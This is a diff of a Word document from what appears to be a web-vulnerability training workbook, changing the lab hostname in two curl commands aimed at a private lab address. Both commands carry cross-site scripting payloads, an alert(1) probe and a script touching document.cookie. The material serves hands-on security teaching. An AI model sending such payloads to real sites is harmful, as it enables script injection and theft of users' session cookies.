--- a/contents/battle-workbook/web-vuln-w06.docx
+++ b/contents/battle-workbook/web-vuln-w06.docx
@@ -308,9 +308,9 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -H "Host: mediforum.6v6.lab" "http://192.168.0.161/api/debug/echo?name=wv06r1-kim&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
+        <w:t>curl -s -H "Host: mediforum.el34.lab" "http://192.168.0.161/api/debug/echo?name=wv06r1-kim&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: mediforum.6v6.lab" --data "txtName=wv06r1-kim&lt;script&gt;document.cookie&lt;/script&gt;&amp;btnSign=Sign" "http://192.168.0.161/api/debug/echo"</w:t>
+        <w:t>curl -s -H "Host: mediforum.el34.lab" --data "txtName=wv06r1-kim&lt;script&gt;document.cookie&lt;/script&gt;&amp;btnSign=Sign" "http://192.168.0.161/api/debug/echo"</w:t>
       </w:r>
     </w:p>
     <w:p>
